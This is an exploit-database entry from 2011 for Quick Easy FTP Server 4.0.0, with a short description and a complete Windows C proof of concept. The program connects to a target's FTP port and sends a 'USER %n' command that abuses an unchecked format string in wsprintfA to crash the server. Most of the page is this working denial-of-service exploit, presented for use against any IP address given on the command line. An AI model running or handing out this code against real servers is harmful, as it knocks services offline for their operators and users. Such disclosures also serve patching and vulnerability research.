Quick easy ftp server 4.0.0 USER命令格式化串漏洞(D.O.S) POC



EKU-ID: 1085 CVE: OSVDB-ID:
Author: ylbhz Published: 2011-10-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Quick easy ftp server 4.0.0 USER command format string Vulnerability
# Date: [date]
# Vendor or Software Link:google can help you.^_^
# Version: 4.0 other mybe effected also
# Category:: [remote]
# Tested on: win2k sp4 (cn)
 
Description:
Quick easy ftp server din't check the format string used in wsprintfA,But I the buffer is too small so I think exploit it is difficult。I use the format string "%n" to crash the program,make a dos attack。
 
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
int SendPayload(char* lpHost, int intPort, char* lpPayload, int intSize);
int main(int argc, char* argv[])
{
 if(argc != 2)
 {
  printf("Quick easy ftp server 4.0.0 USER命令格式化串漏洞(D.O.S) POC\r\n");
  printf("contact: ylbhz@hotmail.com\r\n");
  printf("C:\\>exp [ip address]\r\n");
  return 0;
 }
 char strHost[20] = {0};
 strcpy(strHost, argv[1]);
 char lpBuf[] = "USER %n\r\n\r\n";
 SendPayload(strHost, 21, lpBuf, lstrlenA(lpBuf));
 
 return 0;
}
int SendPayload(char* lpHost, int intPort, char* lpPayload, int intSize)
{
 SOCKET sock;
 struct sockaddr_in client;
 WSADATA wsa;
 printf("[*]Init socket...\r\n");
 if(WSAStartup(MAKEWORD(2,2),&wsa) != 0)
 {
  printf("[-]WSAStartup Error!\r\n");
  return -1;
 }
 try
 {
  client.sin_addr.S_un.S_addr = inet_addr(lpHost);
  client.sin_family = AF_INET;
  client.sin_port = htons(intPort);
 }catch(...)
 {
  printf("[-]socket_inaddr init error!\r\n");
  return -1;
 }
 sock = socket(AF_INET,SOCK_STREAM,0);
 if(sock == SOCKET_ERROR)
 {
  printf("[-]socket create error!\r\n");
  WSACleanup();
  return -1;
 }
 printf("[+]Socket Init success!\r\n");
 printf("[*]Connect the Server...\r\n");
 if(connect(sock,(struct sockaddr *)&client,sizeof(client)) == SOCKET_ERROR)
 {
  printf("[-]Connect Error!\r\n");
  closesocket(sock);
  WSACleanup();
  return -1;
 }
 printf("[+]Connect successfull!\r\n");
 printf("[*]Send Payload!\r\n");
 int intLen = send(sock, lpPayload, intSize, 0);
 if(intLen <= 0) printf("[-]Send Payload Error!\r\n");
  else printf("Send %d bytes\r\n", intLen);
 char strBuf[1024] = {0};
 intLen = recv(sock, strBuf, 1024, 0);
 printf("[*]Close Socket!\r\n");
 closesocket(sock);
 return 0;
}